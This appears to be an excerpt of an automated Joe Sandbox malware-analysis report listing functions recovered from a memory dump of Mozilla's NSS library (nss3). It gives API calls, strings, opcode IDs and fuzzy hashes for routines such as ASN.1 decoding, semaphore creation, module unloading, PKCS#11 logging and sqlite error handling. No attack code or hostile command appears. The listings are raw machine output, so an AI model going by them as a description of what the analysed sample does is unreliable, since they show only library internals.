SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7B8FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C7B8FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C89D820,6C7B9576), ref: 6C7B8FF9
DER_GetInteger_Util.NSS3(?), ref: 6C7B901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C7B903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7B9062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C7B90A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C7B90CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C7B90F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7B912D
free.MOZGLUE(00000000), ref: 6C7B9136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C7B9145

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 41e1abcde59acf8510e88ab6da4e11d6fa06e667cd3f1dfbf6e13308ee14cabf
Instruction ID: fcd3cc7da95981baf9e0a37aeb1a48ee6cb67be424829861df0b0a52c8d15df9
Opcode Fuzzy Hash: 41e1abcde59acf8510e88ab6da4e11d6fa06e667cd3f1dfbf6e13308ee14cabf
Instruction Fuzzy Hash: F751D3B1A042019BE710CF28DE8579AB7F8EFA4358F054939E858A7741E731E949CBD2

Function 6C884960 Relevance: 21.1, APIs: 14, Instructions: 121COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000004,?,6C888061,?,?,?,?), ref: 6C88497D
OpenSemaphoreA.KERNEL32(00100002,00000000,?), ref: 6C88499E
GetLastError.KERNEL32(?,?,6C888061,?,?,?,?), ref: 6C8849AC
PR_SetError.NSS3(FFFFE8C2,0000007B,?,?,6C888061,?,?,?,?), ref: 6C8849C2

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_SetError.NSS3(FFFFE890,00000000,?,?,6C888061,?,?,?,?), ref: 6C8849D6
CreateSemaphoreA.KERNEL32(00000000,6C888061,7FFFFFFF,?), ref: 6C884A19
GetLastError.KERNEL32(?,?,?,?,6C888061,?,?,?,?), ref: 6C884A30
PR_SetError.NSS3(FFFFE8C9,000000B7,?,?,?,?,6C888061,?,?,?,?), ref: 6C884A49
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6C888061,?,?,?,?), ref: 6C884A52
GetLastError.KERNEL32(?,?,?,?,6C888061,?,?,?,?), ref: 6C884A5A
free.MOZGLUE(00000000,?,?,?,?,?,6C888061,?,?,?,?), ref: 6C884A6A
CreateSemaphoreA.KERNEL32(?,6C888061,7FFFFFFF,?), ref: 6C884A9A
free.MOZGLUE(?,?,?,?,?,6C888061,?,?,?,?), ref: 6C884AAE
free.MOZGLUE(?,?,?,?,?,6C888061,?,?,?,?), ref: 6C884AC2

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$LastSemaphorefree$Create$CloseHandleOpenValuemalloc
String ID:
API String ID: 2092618053-0
Opcode ID: 170c143afd532a411642d12c148785478996fd9ab82b2fe6290d49a9aa0af862
Instruction ID: 4ea01f8a40b1c777ac75b39bd6e08c0c3508d232784458123339ae4dd6ea0211
Opcode Fuzzy Hash: 170c143afd532a411642d12c148785478996fd9ab82b2fe6290d49a9aa0af862
Instruction Fuzzy Hash: 4341F671B012059BDB20AFA8DE49B4A77B8ABCA359F100434E909A7B42DB35D504C7A5

Function 6C88C8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000020), ref: 6C88C8B9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C88C8DA
malloc.MOZGLUE(00000001), ref: 6C88C8E4
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C88C8F8
PR_NewLock.NSS3 ref: 6C88C909
PR_NewCondVar.NSS3(00000000), ref: 6C88C918
PR_NewCondVar.NSS3(00000000), ref: 6C88C92A

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

free.MOZGLUE(00000000), ref: 6C88C947

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
String ID:
API String ID: 2931242645-0
Opcode ID: bfc863824bb12ae82353c2ff7d677d8f6d2684e44aecaf214215578ac75f19eb
Instruction ID: 15a26886ad03ffe487bce187238d65ad1915ebd2b1e6fbe3dde165c153d36282
Opcode Fuzzy Hash: bfc863824bb12ae82353c2ff7d677d8f6d2684e44aecaf214215578ac75f19eb
Instruction Fuzzy Hash: 6021C8F1A016055BEB307F799D0965B76B8AF01258F140938E85BC2F02EB31E518C7E2

Function 6C76AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C76AF47

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

FreeLibrary.KERNEL32(?), ref: 6C76AF6D
free.MOZGLUE(?), ref: 6C76AFA4
free.MOZGLUE(?), ref: 6C76AFAA
PR_ExitMonitor.NSS3 ref: 6C76AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C76AFF5
PR_ExitMonitor.NSS3 ref: 6C76B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C76B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C76B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C76B03C

Strings

Unloaded library %s, xrefs: 6C76B023
%s decr => %d, xrefs: 6C76AFF0

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: ec1d55b486e61a68d2c94b9a238fcfbf982350191a2ce754796746c0bd1187ef
Instruction ID: c1cba8cf3b10c5ecde05c4ae6f1c2633f81e5b0bef7d25c923de4ca9ab5942c3
Opcode Fuzzy Hash: ec1d55b486e61a68d2c94b9a238fcfbf982350191a2ce754796746c0bd1187ef
Instruction Fuzzy Hash: A531F7B5A04121ABE7219F66EE44A96B7B5EF0532CB184535EC0597E01E732FC14CBE2

Function 6C7B6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C7B781D,00000000,6C7ABE2C,?,6C7B6B1D,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C7B781D,?,6C7ABE2C,?), ref: 6C7B6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C7B6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C7B6C96

Part of subcall function 6C761240: TlsGetValue.KERNEL32(00000040,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761267
Part of subcall function 6C761240: EnterCriticalSection.KERNEL32(?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C76127C
Part of subcall function 6C761240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761291
Part of subcall function 6C761240: PR_Unlock.NSS3(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C7612A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C7B6CAA

Strings

dbm, xrefs: 6C7B6CA4
dbm:, xrefs: 6C7B6C3A
NSS_DEFAULT_DB_TYPE, xrefs: 6C7B6C91
rdb:, xrefs: 6C7B6C69
extern:, xrefs: 6C7B6C7E
sql:, xrefs: 6C7B6C52

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 68a960b113e6145131ee08043887bc0dec23964fba281de8655198ee141e8fb6
Instruction ID: dae374c27dbca464164e0473118edb3b9445e5d0613a7214349113e8840df85c
Opcode Fuzzy Hash: 68a960b113e6145131ee08043887bc0dec23964fba281de8655198ee141e8fb6
Instruction Fuzzy Hash: 8D0144A170331537E9202B699F5AF56255C9B4215DF180831FF04F1B42EAB6F61581BD

Function 6C7C4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C7878F8), ref: 6C7C4E6D

Part of subcall function 6C7609E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C7606A2,00000000,?), ref: 6C7609F8
Part of subcall function 6C7609E0: malloc.MOZGLUE(0000001F), ref: 6C760A18
Part of subcall function 6C7609E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C760A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C7878F8), ref: 6C7C4ED9

Part of subcall function 6C7B5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C7B7703,?,00000000,00000000), ref: 6C7B5942
Part of subcall function 6C7B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C7B7703), ref: 6C7B5954
Part of subcall function 6C7B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7B596A
Part of subcall function 6C7B5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7B5984
Part of subcall function 6C7B5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C7B5999
Part of subcall function 6C7B5920: free.MOZGLUE(00000000), ref: 6C7B59BA
Part of subcall function 6C7B5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C7B59D3
Part of subcall function 6C7B5920: free.MOZGLUE(00000000), ref: 6C7B59F5
Part of subcall function 6C7B5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C7B5A0A
Part of subcall function 6C7B5920: free.MOZGLUE(00000000), ref: 6C7B5A2E
Part of subcall function 6C7B5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C7B5A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4EB3

Part of subcall function 6C7C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7C4EB8,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C484C
Part of subcall function 6C7C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7C4EB8,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C486D
Part of subcall function 6C7C4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C7C4EB8,?), ref: 6C7C4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4EC0

Part of subcall function 6C7C4470: TlsGetValue.KERNEL32(00000000,?,6C787296,00000000), ref: 6C7C4487
Part of subcall function 6C7C4470: EnterCriticalSection.KERNEL32(?,?,?,6C787296,00000000), ref: 6C7C44A0
Part of subcall function 6C7C4470: PR_Unlock.NSS3(?,?,?,?,6C787296,00000000), ref: 6C7C44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F8F
PK11_UpdateSlotAttribute.NSS3(?,6C89DCB0,00000000), ref: 6C7C4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C7C501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C506B

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: e4d7c0a6e0689da2153b6d0001601b66f639eab7598edc2899ca852f23aa3158
Instruction ID: 96159c11074bc7ac8fd8999a423216c73d5a7569caa75192aa8c0696a727f8dc
Opcode Fuzzy Hash: e4d7c0a6e0689da2153b6d0001601b66f639eab7598edc2899ca852f23aa3158
Instruction Fuzzy Hash: 9351F3B5A002029FDB119F35EE09AAB36B5EF0531DF190635EC0686A02FB32E954D7D3

Function 6C88ABB0 Relevance: 19.7, APIs: 13, Instructions: 173COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C88ABD5
_PR_MD_UNLOCK.NSS3(?), ref: 6C88AC21

Part of subcall function 6C8370F0: LeaveCriticalSection.KERNEL32(6C880C7B), ref: 6C83710D

EnterCriticalSection.KERNEL32(?), ref: 6C88AC44
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C88AC6E
_PR_MD_UNLOCK.NSS3(?), ref: 6C88AC97
EnterCriticalSection.KERNEL32(?), ref: 6C88ACBF
PR_NewCondVar.NSS3(?), ref: 6C88ACDB
_PR_MD_UNLOCK.NSS3(?), ref: 6C88AD0D
PR_SetPollableEvent.NSS3(?), ref: 6C88AD18
EnterCriticalSection.KERNEL32(?), ref: 6C88AD31

Part of subcall function 6C839890: TlsGetValue.KERNEL32(?,?,?,6C8397EB), ref: 6C83989E

_PR_MD_UNLOCK.NSS3(?), ref: 6C88AD89
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C88AD98
_PR_MD_UNLOCK.NSS3(?), ref: 6C88ADC5

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$Enter$CondErrorEventLeavePollableValue
String ID:
API String ID: 829741924-0
Opcode ID: dc2838f95192e3ca7895430d47e35292ed510d90e8280b1c03e203d596d22413
Instruction ID: c12aa5fd850d44937ec1c0f768172e5c7820dfc92f06000afbbc4fc09873c039
Opcode Fuzzy Hash: dc2838f95192e3ca7895430d47e35292ed510d90e8280b1c03e203d596d22413
Instruction Fuzzy Hash: 71617EB28016209BC7309F59CA84786B7F4AF4471AF259D39D85997F92EB35F844CBC0

Function 6C76ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76ACE2
malloc.MOZGLUE(00000001), ref: 6C76ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C76AD02
TlsGetValue.KERNEL32 ref: 6C76AD3C
calloc.MOZGLUE(00000001,?), ref: 6C76AD8C
PR_Unlock.NSS3 ref: 6C76ADC0
free.MOZGLUE(00000000), ref: 6C76AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C76AE58
free.MOZGLUE(00000000), ref: 6C76AE69
free.MOZGLUE(?), ref: 6C76AE78
PR_Unlock.NSS3 ref: 6C76AE8C
free.MOZGLUE(?), ref: 6C76AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C76AEC7

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 1a4f17c58db49ff0de7e7d8c36520e5a8adbc09c3150ec74db0dcc2d0dd2a843
Instruction ID: 6a76ad7d059a13cf57cb66f06a0dfab4a50b5c2c1803b36397d743e4a1a578ee
Opcode Fuzzy Hash: 1a4f17c58db49ff0de7e7d8c36520e5a8adbc09c3150ec74db0dcc2d0dd2a843
Instruction Fuzzy Hash: A2519FB4E011269BDF20DF9AEA4666E77B8AF0636DF140135EC05A7E01D331AE45CBD2

Function 6C7AADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C7AADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7AAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAE29

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7AAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C7AAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C7AAEA0

Strings

C_MessageSignInit, xrefs: 6C7AADE1
hKey = 0x%x, xrefs: 6C7AAE62, 6C7AAE72
(CK_INVALID_HANDLE), xrefs: 6C7AAE1F, 6C7AAE80
hSession = 0x%x, xrefs: 6C7AAE01, 6C7AAE11

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: ae2de8c6d417db34a33a1a59835cf7ce257a3228ea5f48cc761528fbbb105820
Instruction ID: 0742d17b1d459d417da00427c82ac6f754808acc1f9b6364fcb9b21b96bbb78b
Opcode Fuzzy Hash: ae2de8c6d417db34a33a1a59835cf7ce257a3228ea5f48cc761528fbbb105820
Instruction Fuzzy Hash: E231F531601154ABCB209F98DE8DFAA7779AB4632DF444935E8099BB02D734BC09CFD2

Function 6C7A4B80 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DestroyObject), ref: 6C7A4BA6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A4BD7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4BE9

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A4BFF
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C7A4C2D
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4C3F
PR_LogPrint.NSS3(?,00000000), ref: 6C7A4C55

Strings

C_DestroyObject, xrefs: 6C7A4BA1
hObject = 0x%x, xrefs: 6C7A4C17, 6C7A4C27
(CK_INVALID_HANDLE), xrefs: 6C7A4BDF, 6C7A4C35
hSession = 0x%x, xrefs: 6C7A4BC1, 6C7A4BD1

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_DestroyObject
API String ID: 332880674-4243883364
Opcode ID: c4e93fc8ec47227941a8951d4b584eef2e4b5cf3bc3e1ea304d60caa3c23a1ae
Instruction ID: c9136c8fdc52b72b8e4053b8ac638bc7044c61da855742615d5c67c209989e34
Opcode Fuzzy Hash: c4e93fc8ec47227941a8951d4b584eef2e4b5cf3bc3e1ea304d60caa3c23a1ae
Instruction Fuzzy Hash: EF31D532601114BBDB209B988F8CF6A77B4AB4631DF048535E80DA7B01DB25BC09DBD2

Function 6C844C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C844CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C844CFD
sqlite3_value_text16.NSS3(?), ref: 6C844D44

Strings

abort due to ROLLBACK, xrefs: 6C844D27, 6C844D33
invalid, xrefs: 6C844CF1
no more rows available, xrefs: 6C844D2E
out of memory, xrefs: 6C844C78, 6C844C9E
bad parameter or other API misuse, xrefs: 6C844D05
another row available, xrefs: 6C844D20
unknown error, xrefs: 6C844D56
